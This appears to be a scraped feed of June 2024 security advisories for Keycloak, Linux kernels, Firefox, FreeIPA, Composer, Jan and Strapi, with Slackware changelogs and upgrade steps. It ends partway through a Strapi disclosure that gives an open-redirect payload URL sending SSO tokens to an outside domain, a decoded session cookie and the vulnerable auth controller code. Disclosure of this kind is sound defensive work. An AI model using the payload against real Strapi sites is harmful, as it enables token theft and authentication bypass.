A flaw was found in Keycloak in the OAuth 2.0 Pushed Authorization Requests (PAR). Client provided parameters were found to be included in plain text in the KC_RESTART cookie returned by the authorization server's HTTP response to a request_uri authorization request. This could lead to an information disclosure vulnerability.
Link: https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-69FP-7C8P-CRJR

10.06.2024 20:13:01 | ubuntu | [USN-6821-2] Linux kernel vulnerabilities (high)
Several security issues were fixed in the Linux kernel.
Link: https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6821-2

10.06.2024 19:09:36 | ubuntu | [USN-6818-2] Linux kernel (ARM laptop) vulnerabilities (high)
Several security issues were fixed in the Linux kernel.
Link: https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6818-2

10.06.2024 17:27:14 | ubuntu | [USN-6824-1] GIFLIB vulnerabilities (high)
Several security issues were fixed in giflib.
Link: https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6824-1

10.06.2024 14:36:50 | ubuntu | [USN-6823-1] MySQL vulnerabilities (medium)
Several security issues were fixed in MySQL.
Link: https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6823-1

10.06.2024 11:42:42 | ubuntu | [USN-6822-1] Node.js vulnerabilities (critical)
Several security issues were fixed in Node.js.
Link: https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6822-1

10.06.2024 03:00:00 | oraclelinux | [ELSA-2024-3754] ipa security update (important)
[4.11.0-15.0.1]
- Set IPAPLATFORM=rhel when build on Oracle Linux [Orabug: 29516674]
- Add bind to ipa-server-common Requires [Orabug: 36518596]
[4.11.0-15]
- Resolves: RHEL-32231 CVE-2024-3183 ipa: freeipa: user can obtain a hash of the passwords of all domain users and perform offline brute force
- Resolves: RHEL-31409 CVE-2024-2698 ipa: freeipa: delegation rules allow a proxy service to impersonate any user to access another target service
Link: https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3754

10.06.2024 03:00:00 | oraclelinux | [ELSA-2024-3760] ipa security update (important)
[4.6.8-5.0.1.el7_9.17]
- Blank out header-logo.png product-name.png
- Replace login-screen-logo.png [Orabug: 20362818]
[4.6.8-5.el7_9.17]
- Resolves: RHEL-29926 ipa: user can obtain a hash of the passwords of all domain users and perform offline brute force
Link: https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3760

10.06.2024 18:33:08 | npm | [NPM:GHSA-W5XM-MX47-V7C8] lunary-ai/lunary allows users unauthorized access to projects (critical)
In lunary-ai/lunary version v1.2.13, an improper authorization vulnerability exists that allows unauthorized users to access and manipulate projects within an organization they should not have access to. Specifically, the vulnerability is located in the `checkProjectAccess` method within the authorization middleware, which fails to adequately verify if a user has the correct permissions to access a specific project. Instead, it only checks if the user is part of the organization owning the project, overlooking the necessary check against the `account_project` table for explicit project access rights. This flaw enables attackers to gain complete control over all resources within a project, including the ability to create, update, read, and delete any resource, compromising the privacy and security of sensitive information.
Link: https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-W5XM-MX47-V7C8

10.06.2024 17:22:22 | almalinux | [ALSA-2024:3670] ruby:3.3 security, bug fix, and enhancement update (moderate)
ruby:3.3 security, bug fix, and enhancement update
Link: https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3670

10.06.2024 17:17:10 | almalinux | [ALSA-2024:3671] ruby:3.3 security, bug fix, and enhancement update (moderate)
ruby:3.3 security, bug fix, and enhancement update
Link: https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3671

10.06.2024 17:40:44 | android | [ASB-A-223376078] [There are two problems with killBackgroundProcesses in ActivityManager] (high)
In multiple functions of ActivityManagerService.java, there is a possible way to escape Google Play protection due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.
Link: https://secdb.nttzen.cloud/security-advisory/android/ASB-A-223376078

12.06.2024 01:09:41 | ubuntu | [USN-6819-2] Linux kernel vulnerabilities (high)
Several security issues were fixed in the Linux kernel.
Link: https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6819-2
12.06.2024 00:55:39 | slackware | [SSA:2024-163-02] cups (medium)
New cups packages are available for Slackware 15.0 and -current to fix a security issue.

**Here are the details from the Slackware 15.0 ChangeLog**
```
patches/packages/cups-2.4.9-i586-1_slack15.0.txz: Upgraded.
  This update fixes bugs and a security issue:
  When starting the cupsd server with a Listen configuration item pointing
  to a symbolic link, the cupsd process can be caused to perform an
  arbitrary chmod of the provided argument, providing world-writable
  access to the target.
  For more information, see:
    https://www.cve.org/CVERecord?id=CVE-2024-35235
  (* Security fix *)
```

**Where to find the new packages**
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/cups-2.4.9-i586-1_slack15.0.txz
Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/cups-2.4.9-x86_64-1_slack15.0.txz
Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/ap/cups-2.4.9-i586-1.txz
Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/ap/cups-2.4.9-x86_64-1.txz

**MD5 signatures**
Slackware 15.0 package:
eb7a13c45409a0db64a5a5c344c2b249 cups-2.4.9-i586-1_slack15.0.txz
Slackware x86_64 15.0 package:
d270e3ec0741a67116a32bfa9301f4fe cups-2.4.9-x86_64-1_slack15.0.txz
Slackware -current package:
433355277a0f061d6a9b7fcb1f9ad5f5 ap/cups-2.4.9-i586-1.txz
Slackware x86_64 -current package:
49f32bc3bbcf751650cd28f1d4de4694 ap/cups-2.4.9-x86_64-1.txz

**Installation instructions**
Upgrade the package as root:
`# upgradepkg cups-2.4.9-i586-1_slack15.0.txz`
Then, restart the cups server:
`# sh /etc/rc.d/rc.cups restart`
Link: https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-163-02

12.06.2024 00:55:08 | slackware | [SSA:2024-163-01] mozilla-firefox
New mozilla-firefox packages are available for Slackware 15.0 and -current to fix security issues.

**Here are the details from the Slackware 15.0 ChangeLog**
```
patches/packages/mozilla-firefox-115.12.0esr-i686-1_slack15.0.txz: Upgraded.
  This update contains security fixes and improvements.
  For more information, see:
    https://www.mozilla.org/en-US/firefox/115.12.0/releasenotes/
    https://www.mozilla.org/security/advisories/mfsa2024-26/
    https://www.cve.org/CVERecord?id=CVE-2024-5702
    https://www.cve.org/CVERecord?id=CVE-2024-5688
    https://www.cve.org/CVERecord?id=CVE-2024-5690
    https://www.cve.org/CVERecord?id=CVE-2024-5691
    https://www.cve.org/CVERecord?id=CVE-2024-5692
    https://www.cve.org/CVERecord?id=CVE-2024-5693
    https://www.cve.org/CVERecord?id=CVE-2024-5696
    https://www.cve.org/CVERecord?id=CVE-2024-5700
  (* Security fix *)
```

**Where to find the new packages**
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-firefox-115.12.0esr-i686-1_slack15.0.txz
Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-firefox-115.12.0esr-x86_64-1_slack15.0.txz
Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-firefox-127.0-i686-1.txz
Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-firefox-127.0-x86_64-1.txz

**MD5 signatures**
Slackware 15.0 package:
31be3b8bcf0fc600289fd086c921e116 mozilla-firefox-115.12.0esr-i686-1_slack15.0.txz
Slackware x86_64 15.0 package:
4a46fcee6cc710fe47c6efeb269483f4 mozilla-firefox-115.12.0esr-x86_64-1_slack15.0.txz
Slackware -current package:
892ae9e3d7006e6a2a42d001f0d17abb xap/mozilla-firefox-127.0-i686-1.txz
Slackware x86_64 -current package:
eb4e76b154f08bc011300bab583f8464 xap/mozilla-firefox-127.0-x86_64-1.txz

**Installation instructions**
Upgrade the package as root:
`# upgradepkg mozilla-firefox-115.12.0esr-i686-1_slack15.0.txz`
Link: https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-163-01
11.06.2024 23:53:02 | ubuntu | [USN-6821-3] Linux kernel (AWS) vulnerabilities (high)
Several security issues were fixed in the Linux kernel.
Link: https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6821-3

11.06.2024 23:22:44 | maven | [MAVEN:GHSA-2CWW-FGMG-4JQC] Keycloak's admin API allows low privilege users to use administrative functions (high)
Users with low privileges (just plain users in the realm) are able to utilize administrative functionalities within Keycloak admin interface. This issue presents a significant security risk as it allows unauthorized users to perform actions reserved for administrators, potentially leading to data breaches or system compromise.
**Acknowledgements:** Special thanks to Maurizio Agazzini for reporting this issue and helping us improve our project.
Link: https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-2CWW-FGMG-4JQC

11.06.2024 23:05:19 | ubuntu | [USN-6820-2] Linux kernel (NVIDIA) vulnerabilities (high)
Several security issues were fixed in the Linux kernel.
Link: https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6820-2

12.06.2024 00:37:41 | maven | [MAVEN:GHSA-M5VV-6R4H-3VJ9] Azure Identity Libraries and Microsoft Authentication Library Elevation of Privilege Vulnerability (moderate)
Azure Identity Libraries and Microsoft Authentication Library Elevation of Privilege Vulnerability
Link: https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-M5VV-6R4H-3VJ9

12.06.2024 00:37:41 | npm | [NPM:GHSA-M5VV-6R4H-3VJ9] Azure Identity Libraries and Microsoft Authentication Library Elevation of Privilege Vulnerability (moderate)
Azure Identity Libraries and Microsoft Authentication Library Elevation of Privilege Vulnerability
Link: https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-M5VV-6R4H-3VJ9

11.06.2024 20:45:43 | ubuntu | [USN-6828-1] Linux kernel (Intel IoTG) vulnerabilities (high)
Several security issues were fixed in the Linux kernel.
Link: https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6828-1

11.06.2024 15:37:39 | ubuntu | [USN-6826-1] mod_jk vulnerability (high)
mod_jk could allow unintended access to network services.
Link: https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6826-1

11.06.2024 15:24:46 | ubuntu | [USN-6823-1] MySQL vulnerabilities (medium)
Several security issues were fixed in MySQL.
Link: https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6823-1

11.06.2024 15:15:50 | ubuntu | [USN-6817-2] Linux kernel (OEM) vulnerabilities (high)
Several security issues were fixed in the Linux kernel.
Link: https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6817-2

11.06.2024 06:04:35 | ubuntu | [USN-6827-1] LibTIFF vulnerability (medium)
LibTIFF could be made to crash if it opened a specially crafted file.
Link: https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6827-1

11.06.2024 03:00:00 | debian | [DSA-5707-1] vlc
security update
Link: https://secdb.nttzen.cloud/security-advisory/debian/DSA-5707-1

11.06.2024 03:00:00 | debian | [DSA-5708-1] cyrus-imapd (medium)
security update
Link: https://secdb.nttzen.cloud/security-advisory/debian/DSA-5708-1
11.06.2024 03:00:00 | mozilla | [MFSA-2024-26] Security Vulnerabilities fixed in Firefox ESR 115.12 (high)
- CVE-2024-5688: Use-after-free in JavaScript object transplant (high)
  If a garbage collection was triggered at the right time, a use-after-free could have occurred during object transplant.
- CVE-2024-5690: External protocol handlers leaked by timing attack (moderate)
  By monitoring the time certain operations take, an attacker could have guessed which external protocol handlers were functional on a user's system.
- CVE-2024-5691: Sandboxed iframes were able to bypass sandbox restrictions to open a new window (moderate)
  By tricking the browser with a `X-Frame-Options` header, a sandboxed iframe could have presented a button that, if clicked by a user, would bypass restrictions to open a new window.
- CVE-2024-5692: Bypass of file name restrictions during saving (moderate)
  On Windows 10, when using the 'Save As' functionality, an attacker could have tricked the browser into saving the file with a disallowed extension such as `.url` by including an invalid character in the extension. *Note:* This issue only affected Windows operating systems. Other operating systems are unaffected.
- CVE-2024-5693: Cross-Origin Image leak via Offscreen Canvas (moderate)
  Offscreen Canvas did not properly track cross-origin tainting, which could be used to access image data from another site in violation of same-origin policy.
- CVE-2024-5696: Memory Corruption in Text Fragments (moderate)
  By manipulating the text in an `<input>` tag, an attacker could have caused corrupt memory leading to a potentially exploitable crash.
- CVE-2024-5700: Memory safety bugs fixed in Firefox 127, Firefox ESR 115.12, and Thunderbird 115.12 (high)
  Memory safety bugs present in Firefox 126, Firefox ESR 115.11, and Thunderbird 115.11. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.
- CVE-2024-5702: Use-after-free in networking (high)
  Memory corruption in the networking stack could have led to a potentially exploitable crash.
Link: https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-26

11.06.2024 03:00:00 | mozilla | [MFSA-2024-25] Security Vulnerabilities fixed in Firefox 127 (high)
- CVE-2024-5687: An incorrect principal could have been used when opening new tabs (high)
  If a specific sequence of actions is performed when opening a new tab, the triggering principal associated with the new tab may have been incorrect. The triggering principal is used to calculate many values, including the `Referer` and `Sec-*` headers, meaning there is the potential for incorrect security checks within the browser in addition to incorrect or misleading information sent to remote websites. *This bug only affects Firefox for Android. Other versions of Firefox are unaffected.*
- CVE-2024-5688: Use-after-free in JavaScript object transplant (high)
  If a garbage collection was triggered at the right time, a use-after-free could have occurred during object transplant.
- CVE-2024-5689: User confusion and possible phishing vector via Firefox Screenshots (moderate)
  In addition to detecting when a user was taking a screenshot (XXX), a website was able to overlay the 'My Shots' button that appeared, and direct the user to a replica Firefox Screenshots page that could be used for phishing.
- CVE-2024-5690: External protocol handlers leaked by timing attack (moderate)
  By monitoring the time certain operations take, an attacker could have guessed which external protocol handlers were functional on a user's system.
- CVE-2024-5691: Sandboxed iframes were able to bypass sandbox restrictions to open a new window (moderate)
  By tricking the browser with a `X-Frame-Options` header, a sandboxed iframe could have presented a button that, if clicked by a user, would bypass restrictions to open a new window.
- CVE-2024-5692: Bypass of file name restrictions during saving (moderate)
  On Windows, when using the 'Save As' functionality, an attacker could have tricked the browser into saving the file with a disallowed extension such as `.url` by including an invalid character in the extension. *Note:* This issue only affected Windows operating systems. Other operating systems are unaffected.
- CVE-2024-5693: Cross-Origin Image leak via Offscreen Canvas (moderate)
  Offscreen Canvas did not properly track cross-origin tainting, which could be used to access image data from another site in violation of same-origin policy.
- CVE-2024-5694: Use-after-free in JavaScript Strings (moderate)
  An attacker could have caused a use-after-free in the JavaScript engine to read memory in the JavaScript string section of the heap.
- CVE-2024-5695: Memory Corruption using allocation using out-of-memory conditions (moderate)
  If an out-of-memory condition occurs at a specific point using allocations in the probabilistic heap checker, an assertion could have been triggered, and in rarer situations, memory corruption could have occurred.
- CVE-2024-5696: Memory Corruption in Text Fragments (moderate)
  By manipulating the text in an `<input>` tag, an attacker could have caused corrupt memory leading to a potentially exploitable crash.
- CVE-2024-5697: Website was able to detect when Firefox was taking a screenshot of them (low)
  A website was able to detect when a user took a screenshot of a page using the built-in Screenshot functionality in Firefox.
- CVE-2024-5698: Data-list could have overlaid address bar (low)
  By manipulating the fullscreen feature while opening a data-list, an attacker could have overlaid a text box over the address bar. This could have led to user confusion and possible spoofing attacks.
- CVE-2024-5699: Cookie prefixes not treated as case-sensitive (low)
  In violation of spec, cookie prefixes such as `__Secure` were being ignored if they were not correctly capitalized - by spec they should be checked with a case-insensitive comparison. This could have resulted in the browser not correctly honoring the behaviors specified by the prefix.
- CVE-2024-5700: Memory safety bugs fixed in Firefox 127, Firefox ESR 115.12, and Thunderbird 115.12 (high)
  Memory safety bugs present in Firefox 126, Firefox ESR 115.11, and Thunderbird 115.11. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.
- CVE-2024-5701: Memory safety bugs fixed in Firefox 127 (high)
  Memory safety bugs present in Firefox 126. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.
Link: https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-25
11.06.2024 03:00:00 | oraclelinux | [ELSA-2024-3755] idm:DL1 security update (important)
bind-dyndb-ldap
custodia
ipa
[4.9.13-10.0.1]
- Set IPAPLATFORM=rhel when build on Oracle Linux [Orabug: 29516674]
[4.9.13-10]
- kdb: apply combinatorial logic for ticket flags (CVE-2024-3183)
  Resolves: RHEL-29927
- kdb: fix vulnerability in GCD rules handling (CVE-2024-2698)
  Resolves: RHEL-29692
ipa-healthcheck
opendnssec
python-jwcrypto
python-kdcproxy
python-qrcode
python-yubico
pyusb
slapi-nis
softhsm
Link: https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3755

11.06.2024 03:00:00 | oraclelinux | [ELSA-2024-3783] firefox security update (moderate)
[115.11.0-1.0.1]
- Add firefox-oracle-default-prefs.js and remove the corresponding OpenELA file
[115.11.0-1]
- Update to 115.11.0 build1
Link: https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3783

11.06.2024 03:00:00 | oraclelinux | [ELSA-2024-3784] thunderbird security update (moderate)
[115.11.0-1.0.1]
- Add Oracle prefs file
[115.11.0-1]
- Update to 115.11.0 build2
Link: https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3784

11.06.2024 01:15:09 | alpinelinux | [ALPINE:CVE-2024-35241] composer vulnerability (high)
[From CVE-2024-35241] Composer is a dependency manager for PHP. On the 2.x branch prior to versions 2.2.24 and 2.7.7, the `status`, `reinstall` and `remove` commands with packages installed from source via git containing specially crafted branch names in the repository can be used to execute code. Patches for this issue are available in version 2.2.24 for 2.2 LTS or 2.7.7 for mainline. As a workaround, avoid installing dependencies via git by using `--prefer-dist` or the `preferred-install: dist` config setting.
Link: https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-35241

11.06.2024 01:15:09 | alpinelinux | [ALPINE:CVE-2024-35242] composer vulnerability (high)
[From CVE-2024-35242] Composer is a dependency manager for PHP. On the 2.x branch prior to versions 2.2.24 and 2.7.7, the `composer install` command running inside a git/hg repository which has specially crafted branch names can lead to command injection. This requires cloning untrusted repositories. Patches are available in version 2.2.24 for 2.2 LTS or 2.7.7 for mainline. As a workaround, avoid cloning potentially compromised repositories.
Link: https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-35242

11.06.2024 22:56:11 | npm | [NPM:GHSA-878H-RQCQ-MV3X] Jan path traversal vulnerability (critical)
An arbitrary file upload vulnerability in the /v1/app/appendFileSync interface of Jan v0.4.12 allows attackers to execute arbitrary code via uploading a crafted file.
Link: https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-878H-RQCQ-MV3X

11.06.2024 22:56:06 | npm | [NPM:GHSA-QFJH-MVQ6-C5P8] Jan path traversal vulnerability (critical)
An arbitrary file upload vulnerability in the /v1/app/writeFileSync interface of Jan v0.4.12 allows attackers to execute arbitrary code via uploading a crafted file.
Link: https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-QFJH-MVQ6-C5P8

11.06.2024 22:29:49 | npm | [NPM:GHSA-5JQC-QJ57-4HRC] Jan path traversal vulnerability (high)
Jan v0.4.12 was discovered to contain an arbitrary file read vulnerability via the /v1/app/readFileSync interface.
Link: https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-5JQC-QJ57-4HRC
13.06.2024 00:36:48 | slackware | [SSA:2024-164-01] mozilla-thunderbird
New mozilla-thunderbird packages are available for Slackware 15.0 and -current to fix security issues.

**Here are the details from the Slackware 15.0 ChangeLog**
```
patches/packages/mozilla-thunderbird-115.11.1-i686-1_slack15.0.txz: Upgraded.
  This release contains security fixes and improvements.
  For more information, see:
    https://www.mozilla.org/en-US/thunderbird/115.11.1/releasenotes/
    https://www.mozilla.org/en-US/security/advisories/mfsa2024-23/
    https://www.cve.org/CVERecord?id=CVE-2024-4367
    https://www.cve.org/CVERecord?id=CVE-2024-4767
    https://www.cve.org/CVERecord?id=CVE-2024-4768
    https://www.cve.org/CVERecord?id=CVE-2024-4769
    https://www.cve.org/CVERecord?id=CVE-2024-4770
    https://www.cve.org/CVERecord?id=CVE-2024-4777
  (* Security fix *)
```

**Where to find the new packages**
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-thunderbird-115.11.1-i686-1_slack15.0.txz
Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-thunderbird-115.11.1-x86_64-1_slack15.0.txz
Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-thunderbird-127.0-i686-1.txz
Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-thunderbird-127.0-x86_64-1.txz

**MD5 signatures**
Slackware 15.0 package:
67a3a82d0144edac36b59b5157cd2062 mozilla-thunderbird-115.11.1-i686-1_slack15.0.txz
Slackware x86_64 15.0 package:
f1cd8a474bd06b6ffc91c8fad66b2a70 mozilla-thunderbird-115.11.1-x86_64-1_slack15.0.txz
Slackware -current package:
17c61bf1355d0423332550694e950300 xap/mozilla-thunderbird-127.0-i686-1.txz
Slackware x86_64 -current package:
667f46e200276070eccb35f887072711 xap/mozilla-thunderbird-127.0-x86_64-1.txz

**Installation instructions**
Upgrade the package as root:
`# upgradepkg mozilla-thunderbird-115.11.1-i686-1_slack15.0.txz`
Link: https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-164-01
12.06.2024 22:42:24 | maven | [MAVEN:GHSA-CQ42-VHV7-XR7P] Keycloak Denial of Service via account lockout (low)
In any realm set with "User (Self) registration" a user that is registered with a username in email format can be "locked out" (denied from logging in) using his username.
Link: https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-CQ42-VHV7-XR7P

12.06.2024 22:41:06 | maven | [MAVEN:GHSA-4VC8-PG5C-VG4X] Keycloak's improper input validation allows using email as username (low)
Keycloak allows the use of email as a username and doesn't check that an account with this email already exists. That could lead to the inability to reset/login with email for the user. This is caused by usernames being evaluated before emails.
Link: https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-4VC8-PG5C-VG4X
12.06.2024 22:39:13 npm [NPM:GHSA-WRVH-RCMR-9QFC] @strapi/plugin-users-permissions leaks 3rd party authentication tokens and authentication bypass (high)

### Summary

By combining two vulnerabilities (an `Open Redirect` and `session token sent as URL query parameter`) in the Strapi framework, it is possible for an unauthenticated attacker to bypass authentication mechanisms and retrieve the 3rd party tokens. The attack requires user interaction (one click).

### Impact

Unauthenticated attackers can leverage two vulnerabilities to obtain a 3rd party token and bypass the authentication of Strapi apps.

### Technical details

#### Vulnerability 1: Open Redirect

##### Description

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain.

In the specific context of Strapi, this vulnerability allows the SSO token to be stolen, allowing an attacker to authenticate himself within the application.

##### Remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behavior can be avoided in two ways:

- Remove the redirection function from the application, and replace links to it with direct links to the relevant target URLs.
- Maintain a server-side list of all URLs that are permitted for redirection. Instead of passing the target URL as a parameter to the redirector, pass an index into this list.

If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:

- The application should use relative URLs in all of its redirects, and the redirection function should strictly validate that the URL received is a relative URL.
- The application should use URLs relative to the web root for all of its redirects, and the redirection function should validate that the URL received starts with a slash character. It should then prepend http://yourdomainname.com to the URL before issuing the redirect.

###### Example 1: Open Redirect in /api/connect/microsoft via `XXXXX["callback"]`

- Path: /api/connect/microsoft
- Parameter: `XXXXX["callback"]`

Payload:

```plaintext
https://google.fr/
```

Final payload:

```plaintext
https://<TARGET>/api/connect/microsoft?callback=https://google.fr/
```

User clicks on the link:

![c1](https://github.com/strapi/strapi/assets/30262080/c1944cf8-2ef0-4214-ba9e-d4aad10d85ba)

Look at the intercepted request in Burp and see the redirect to Microsoft:

![c0](https://github.com/strapi/strapi/assets/30262080/0c3d9289-432c-46ac-a7e3-eafe15f02483)

Microsoft checks the cookies and redirects to the original domain (and route) but with different GET parameters.

Then, the page redirects to the domain controlled by the attacker (and a token is added to the controlled URL):

![c2](https://github.com/strapi/strapi/assets/30262080/009e3898-1ccf-4ee4-9c29-496ff6b302d0)

The domain originally specified (https://google.fr) as the `XXXXX["callback"]` parameter is present in the cookies. So `<TARGET>` is using the cookies (`koa.sess`) to redirect.

![c3](https://github.com/strapi/strapi/assets/30262080/4c25cb6c-c9e8-4c2d-aa61-1ad1442e5f4d)

`koa.sess` cookie:

```base64
eyJncmFudCI6eyJwcm92aWRlciI6Im1pY3Jvc29mdCIsImR5bmFtaWMiOnsiY2FsbGJhY2siOiJodHRwczovL2dvb2dsZS5mci8ifX0sIl9leHBpcmUiOjE3MDAyMzQyNDQyNjMsIl9tYXhBZ2UiOjg2NDAwMDAwfQ==
```

```json
{"grant":{"provider":"microsoft","dynamic":{"callback":"https://google.fr/"}},"_expire":1700234244263,"_maxAge":86400000}
```

The vulnerability seems to come from the application's core:

File: [packages/plugins/users-permissions/server/controllers/auth.js](https://github.com/strapi/strapi/blob/develop/packages/plugins/users-permissions/server/controllers/auth.js)

```js
'use strict';

/**
 * Auth.js controller
 *
 * @description: A set of functions called "actions" for managing `Auth`.
 */

/* eslint-disable no-useless-escape */
const crypto = require('crypto');
const _ = require('lodash');
const { concat, compact, isArray } = require('lodash/fp');
const utils = require('@strapi/utils');
const {
  contentTypes: { getNonWritableAttributes },
} = require('@strapi/utils');
const { getService } = require('../utils');
const {
  validateCallbackBody,
  validateRegisterBody,
  validateSendEmailConfirmationBody,
  validateForgotPasswordBody,
  validateResetPasswordBody,
  validateEmailConfirmationBody,
  validateChangePasswordBody,
} = require('./validation/auth');

const { getAbsoluteAdminUrl, getAbsoluteServerUrl, sanitize } = utils;
const { ApplicationError, ValidationError, ForbiddenError } = utils.errors;

const sanitizeUser = (user, ctx) => {
  const { auth } = ctx.state;
  const userSchema = strapi.getModel('plugin::users-permissions.user');

  return sanitize.contentAPI.output(user, userSchema, { auth });
};

module.exports = {
  async callback(ctx) {
    const provider = ctx.params.provider || 'local';
    const params = ctx.request.body;

    const store = strapi.store({ type: 'plugin', name: 'users-permissions' });
    const grantSettings = await store.get({ key: 'grant' });

    const grantProvider = provider === 'local' ? 'email' : provider;

    if (!_.get(grantSettings, [grantProvider, 'enabled'])) {
      throw new ApplicationError('This provider is disabled');
    }

    if (provider === 'local') {
      await validateCallbackBody(params);

      const { identifier } = params;

      // Check if the user exists.
      const user = await strapi.query('plugin::users-permissions.user').findOne({
        where: {
          provider,
          $or: [{ email: identifier.toLowerCase() }, { username: identifier }],
        },
      });

      if (!user) {
        throw new ValidationError('Invalid identifier or password');
      }

      if (!user.password) {
        throw new ValidationError('Invalid identifier or password');
      }

      const validPassword = await getService('user').validatePassword(
        params.password,
        user.password
      );

      if (!validPassword) {
        throw new ValidationError('Invalid identifier or password');
      }

      const advancedSettings = await store.get({ key: 'advanced' });
      const requiresConfirmation = _.get(advancedSettings, 'email_confirmation');

      if (requiresConfirmation && user.confirmed !== true) {
        throw new ApplicationError('Your account email is not confirmed');
      }

      if (user.blocked === true) {
        throw new ApplicationError('Your account has been blocked by an administrator');
      }

      return ctx.send({
        jwt: getService('jwt').issue({ id: user.id }),
        user: await sanitizeUser(user, ctx),
      });
    }

    // Connect the user with the third-party provider.
    try {
      const user = await getService('providers').connect(provider, ctx.query);

      if (user.blocked) {
        throw new ForbiddenError('Your account has been blocked by an administrator');
      }

      return ctx.send({
        jwt: getService('jwt').issue({ id: user.id }),
        user: await sanitizeUser(user, ctx),
      });
    } catch (error) {
      throw new ApplicationError(error.message);
    }
  },

  //...

  async connect(ctx, next) {
    const grant = require('grant-koa');

    const providers = await strapi
      .store({ type: 'plugin', name: 'users-permissions', key: 'grant' })
      .get();

    const apiPrefix = strapi.config.get('api.rest.prefix');
    const grantConfig = {
      defaults: {
        prefix: `${apiPrefix}/connect`,
      },
      ...providers,
    };

    const [requestPath] = ctx.request.url.split('?');
    const provider = requestPath.split('/connect/')[1].split('/')[0];

    if (!_.get(grantConfig[provider], 'enabled')) {
      throw new ApplicationError('This provider is disabled');
    }

    if (!strapi.config.server.url.startsWith('http')) {
      strapi.log.warn(
        'You are using a third party provider for login. Make sure to set an absolute url in config/server.js. More info here: https://docs.strapi.io/developer-docs/latest/plugins/users-permissions.html#setting-up-the-server-url'
      );
    }

    // Ability to pass OAuth callback dynamically
    grantConfig[provider].callback =
      _.get(ctx, 'query.callback') ||
      _.get(ctx, 'session.grant.dynamic.callback') ||
      grantConfig[provider].callback;
    grantConfig[provider].redirect_uri = getService('providers').buildRedirectUri(provider);

    return grant(grantConfig)(ctx, next);
  },

  //...
};
```

And more specifically:

```js
...
    // Ability to pass OAuth callback dynamically
    grantConfig[provider].callback =
      _.get(ctx, 'query.callback') ||
      _.get(ctx, 'session.grant.dynamic.callback') ||
      grantConfig[provider].callback;
